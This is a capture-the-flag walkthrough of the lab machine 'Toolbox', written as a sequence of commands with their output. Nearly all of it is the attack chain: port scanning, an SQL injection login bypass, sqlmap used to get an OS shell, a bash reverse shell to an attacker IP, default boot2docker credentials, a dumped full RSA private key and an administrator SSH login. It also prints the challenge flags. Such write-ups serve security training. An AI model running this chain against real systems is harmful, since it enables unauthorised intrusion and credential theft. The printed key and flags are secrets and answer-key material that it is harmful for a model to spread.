Machine-Name  :  Toolbox
IP-Address    :  10.129.121.173

Command-Line: sudo nmap 10.129.121.173 -p- -A -T4
Result:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-25 05:58 EDT
    Nmap scan report for 10.129.121.173
    Host is up (0.048s latency).
    Not shown: 65521 closed ports
    PORT      STATE SERVICE       VERSION
    21/tcp    open  ftp           FileZilla ftpd
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
    | ftp-syst:
    |_  SYST: UNIX emulated by FileZilla
    22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
    | ssh-hostkey:
    |   2048 5b:1a:a1:81:99:ea:f7:96:02:19:2e:6e:97:04:5a:3f (RSA)
    |   256 a2:4b:5a:c7:0f:f3:99:a1:3a:ca:7d:54:28:76:b2:dd (ECDSA)
    |_  256 ea:08:96:60:23:e2:f4:4f:8d:05:b3:18:41:35:23:39 (ED25519)
    135/tcp   open  msrpc         Microsoft Windows RPC
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    443/tcp   open  tcpwrapped
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: 400 Bad Request
    | ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
    | Not valid before: 2020-02-18T17:45:56
    |_Not valid after:  2021-02-17T17:45:56
    |_ssl-date: TLS randomness does not represent time
    | tls-alpn:
    |_  http/1.1
    445/tcp   open  microsoft-ds?
    5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    49664/tcp open  msrpc         Microsoft Windows RPC
    49665/tcp open  msrpc         Microsoft Windows RPC
    49666/tcp open  msrpc         Microsoft Windows RPC
    49667/tcp open  msrpc         Microsoft Windows RPC
    49668/tcp open  msrpc         Microsoft Windows RPC
    49669/tcp open  msrpc         Microsoft Windows RPC
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=6/25%OT=21%CT=1%CU=30914%PV=Y%DS=2%DC=T%G=Y%TM=60D5A91
    OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS=
    OS:U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS
    OS:%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%
    OS:DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=
    OS:0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S
    OS:=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=
    OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=
    OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
    OS:=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=
    OS:Z)

    Network Distance: 2 hops
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: -1s
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2021-06-25T09:59:47
    |_  start_date: N/A

    TRACEROUTE (using port 23/tcp)
    HOP RTT      ADDRESS
    1   49.09 ms 10.10.14.1
    2   49.26 ms 10.129.121.173

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 92.82 seconds


Command-Line: ftp 10.129.121.173
Username: anonymous
ftp> dir
Result:
    -r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe

Notes: Project is most likely inside Docker container.


Browser: https://10.129.121.173:443
Result: Page with FQDN.
Domain-Name: admin.megalogistic.com

Command-Line: sudo nano /etc/hosts
Result:
    10.129.121.173  admin.megalogistic.com

Browser: https://admin.megalogistic.com
Result: Sign in page.
Notes: Username prone to SQL injection.

SQL-injection: admin' or 1=1 --
Result:
    *** CMS ADMIN ACCESS ***


Notes:
  SERVER-STATUS:
    Server is currently stable
    The server is running normally and no issues have recently been detected.
    If you notice an outage, please report it to the administrator.

  TO-DO-LIST:
    1.) Send credentials to Tony.
    2.) Update Printer Drivers.

  ACTIVE-USERS:
    12 active users.


Notes: Logged out. Went back to sign-in page. Started Burp and intercepted the POST request to admin.megalogistic.com and "copied to file".
Result:
    ./toolbox.req

Command-Line: sqlmap -r toolbox.req --risk=3 --level=3 --batch --force-ssl
Result:
    ./sqplmap-results.txt
Notes: Vulnerable to reverrse-shell.

Command-Line: nc -lvnp 9012
Command-Line: sqlmap -r toolbox.req --risk=3 --level=3 --batch --force-ssl --os-shell
Result:
    os-shell>
    *** SQLMAP REVERSE SHELL ***

os-shell> bash -c 'bash -i >& /dev/tcp/10.10.14.72/9012 0>&1'
Result:
    postgres@01ebfd1b89f1:/var/lib/postgresql/11/main$
    *** REVERSE SHELL ***
    *** USER ACCESS ***

postgres@01ebfd1b89f1:/var/lib/postgresql/11/main$ cd ../../
postgres@01ebfd1b89f1:/var/lib/postgresql/$ cat user.txt
Result:
    f0183e44378ea9774433e2ca6ac78c6a
    *** USER FLAG ***

postgres@01ebfd1b89f1:/var/lib$ ifconfig
Result:
    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
            ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
            RX packets 967  bytes 95831 (93.5 KiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 586  bytes 101038 (98.6 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
            inet 127.0.0.1  netmask 255.0.0.0
            loop  txqueuelen 1000  (Local Loopback)
            RX packets 2049  bytes 666673 (651.0 KiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 2049  bytes 666673 (651.0 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


Browser: docker2boot
URL: https://github.com/boot2docker/boot2docker

postgres@01ebfd1b89f1:/var/lib$ ssh docker@172.17.0.1
Password: tcuser
Result:
       ( '>')
      /) TC (\   Core is distributed with ABSOLUTELY NO WARRANTY.
     (/-_--_-\)           www.tinycorelinux.net

    docker@box:~$

docker@box:~$ cd /
docker@box:/$ cd c
docker@box:/c$ cd Users
docker@box:/c/Users$ cd Administrator
docker@box:/c/Users/Administrator$ cd Desktop
docker@box:/c/Users/Administrator/Desktop$ cat root.txt
Result:
    cc9a0b76ac17f8f475250738b96261b3
    *** ROOT FLAG ***

docker@box:/c/Users/Administrator/.ssh$ cat id_rsa
Result:
    -----BEGIN RSA PRIVATE KEY-----
    MIIEowIBAAKCAQEAvo4SLlg/dkStA4jDUNxgF8kbNAF+6IYLNOOCeppfjz6RSOQv
    Md08abGynhKMzsiiVCeJoj9L8GfSXGZIfsAIWXn9nyNaDdApoF7Mfm1KItgO+W9m
    M7lArs4zgBzMGQleIskQvWTcKrQNdCDj9JxNIbhYLhJXgro+u5dW6EcYzq2MSORm
    7A+eXfmPvdr4hE0wNUIwx2oOPr2duBfmxuhL8mZQWu5U1+Ipe2Nv4fAUYhKGTWHj
    4ocjUwG9XcU0iI4pcHT3nXPKmGjoPyiPzpa5WdiJ8QpME398Nne4mnxOboWTp3jG
    aJ1GunZCyic0iSwemcBJiNyfZChTipWmBMK88wIDAQABAoIBAH7PEuBOj+UHrM+G
    Stxb24LYrUa9nBPnaDvJD4LBishLzelhGNspLFP2EjTJiXTu5b/1E82qK8IPhVlC
    JApdhvDsktA9eWdp2NnFXHbiCg0IFWb/MFdJd/ccd/9Qqq4aos+pWH+BSFcOvUlD
    vg+BmH7RK7V1NVFk2eyCuS4YajTW+VEwD3uBAl5ErXuKa2VP6HMKPDLPvOGgBf9c
    l0l2v75cGjiK02xVu3aFyKf3d7t/GJBgu4zekPKVsiuSA+22ZVcTi653Tum1WUqG
    MjuYDIaKmIt9QTn81H5jAQG6CMLlB1LZGoOJuuLhtZ4qW9fU36HpuAzUbG0E/Fq9
    jLgX0aECgYEA4if4borc0Y6xFJxuPbwGZeovUExwYzlDvNDF4/Vbqnb/Zm7rTW/m
    YPYgEx/p15rBh0pmxkUUybyVjkqHQFKRgu5FSb9IVGKtzNCtfyxDgsOm8DBUvFvo
    qgieIC1S7sj78CYw1stPNWS9lclTbbMyqQVjLUvOAULm03ew3KtkURECgYEA17Nr
    Ejcb6JWBnoGyL/yEG44h3fHAUOHpVjEeNkXiBIdQEKcroW9WZY9YlKVU/pIPhJ+S
    7s++kIu014H+E2SV3qgHknqwNIzTWXbmqnclI/DSqWs19BJlD0/YUcFnpkFG08Xu
    iWNSUKGb0R7zhUTZ136+Pn9TEGUXQMmBCEOJLcMCgYBj9bTJ71iwyzgb2xSi9sOB
    MmRdQpv+T2ZQQ5rkKiOtEdHLTcV1Qbt7Ke59ZYKvSHi3urv4cLpCfLdB4FEtrhEg
    5P39Ha3zlnYpbCbzafYhCydzTHl3k8wfs5VotX/NiUpKGCdIGS7Wc8OUPBtDBoyi
    xn3SnIneZtqtp16l+p9pcQKBgAg1Xbe9vSQmvF4J1XwaAfUCfatyjb0GO9j52Yp7
    MlS1yYg4tGJaWFFZGSfe+tMNP+XuJKtN4JSjnGgvHDoks8dbYZ5jaN03Frvq2HBY
    RGOPwJSN7emx4YKpqTPDRmx/Q3C/sYos628CF2nn4aCKtDeNLTQ3qDORhUcD5BMq
    bsf9AoGBAIWYKT0wMlOWForD39SEN3hqP3hkGeAmbIdZXFnUzRioKb4KZ42sVy5B
    q3CKhoCDk8N+97jYJhPXdIWqtJPoOfPj6BtjxQEBoacW923tOblPeYkI9biVUyIp
    BYxKDs3rNUsW1UUHAvBh0OYs+v/X+Z/2KVLLeClznDJWh/PNqF5I
    -----END RSA PRIVATE KEY-----


Notes: Placed id_rsa into file named admin_id_rsa.
Result:
    ./admin_id_rsa

Command-Line: ssh -i admin_id_rsa administrator@10.129.121.173
Result:
    administrator@TOOLBOX C:\Users\Administrator>

administrator@TOOLBOX C:\Users\Administrator>whoami
Result:
    toolbox\administrator
    *** ROOT OWNED ***
